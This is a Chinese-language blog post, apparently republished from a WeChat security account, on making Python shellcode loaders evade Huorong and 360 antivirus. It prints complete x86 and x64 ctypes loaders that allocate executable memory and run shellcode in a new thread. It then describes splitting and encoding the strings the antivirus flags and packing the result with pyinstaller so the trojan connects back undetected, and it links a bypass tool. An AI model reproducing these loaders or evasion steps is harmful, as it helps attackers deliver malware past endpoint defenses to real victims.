Python免杀 火绒、360

admin

102522
文章

87
评论

2023年6月28日07:51:14评论59 views字数 1396阅读4分39秒阅读模式

大家好，我是HexaGon的X客套话不会说直接上干货

Python免杀对于python版本有所要求Python分 X86和X64

x86 运行shellcode的代码

import ctypes
# shellcode填这里shellcode = b"Xfc....{shellcode}..."

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

x64 运行shellcode的代码

import ctypes
# shellcode填这里shellcode = b"Xfc....{shellcode}..."
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage),ctypes.create_string_buffer(shellcode), len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

看代码火绒直接查杀

Python免杀火绒、360

随便生成一个shellcode

但是不能直接用要拿出指定的字段

Python免杀火绒、360

运行木马上线但是不免杀

Python免杀火绒、360

要找火绒查杀的字段先把后面的代码删除

Python免杀火绒、360

查杀之后发现shellcode没问题但是要运行上线代码还要加回去

Python免杀火绒、360

一句一句往回加

Python免杀火绒、360

当然没必要一句一句往回加、这个字段就是火绒查杀的标志

Python免杀火绒、360

刚测试了一下发现下面那个字段也会查杀那就两个都取消

Python免杀火绒、360

然后这两个字段要进行加密编码了、这个就是你自己的思路、随机应变的、但是你要记住是怎么搞的、不然后面你没法用、

我的思路将命令简化、先将两条命令合成一条

Python免杀火绒、360

用python的方法运行、

Python免杀火绒、360

木马可以上线、但是还是不免杀因为字段还在文件里面

Python免杀火绒、360

把刚才的关键字拆解

Python免杀火绒、360

依然不行继续拆解

Python免杀火绒、360

直接写脚本拆成列表

Python免杀火绒、360

拆成这样在组装成字符串

Python免杀火绒、360

木马上线用pyinstaller -Fw 打包成exe文件就ok了

Python免杀火绒、360

但是运行exe火绒查杀了

Python免杀火绒、360

经过多次编码、免杀上线

Python免杀火绒、360

工具分享给大家 GUI图形化脚本仅支持 python3 环境使用切不能有python2环境

https://github.com/beoutnaprun/MiniBypass

这里是HexaGon六边形实验室，我们下次再见

原文始发于微信公众号（HexaGoners）：Python免杀火绒、360

左青龙
微信扫一扫

右白虎
微信扫一扫

Python免杀火绒、360

在原始进程中实现DLL注入加载

IDA 技巧（9）如何重新分析你的 Binary？

一种利用合法工具渗透的新型方法

如何用纯猜的方式逆向喜马拉雅xm文件加密(wasm部分)

爬虫入门-服务端cookie反爬与header反爬

爬虫入门-js端cookie反爬与无限debugger

AOSP源码定制-内核驱动编写

入门编译原理之前端体验

Linux egg-hunt shellcode

Typora LicenseManager过期分析

发表评论

在线咨询

微信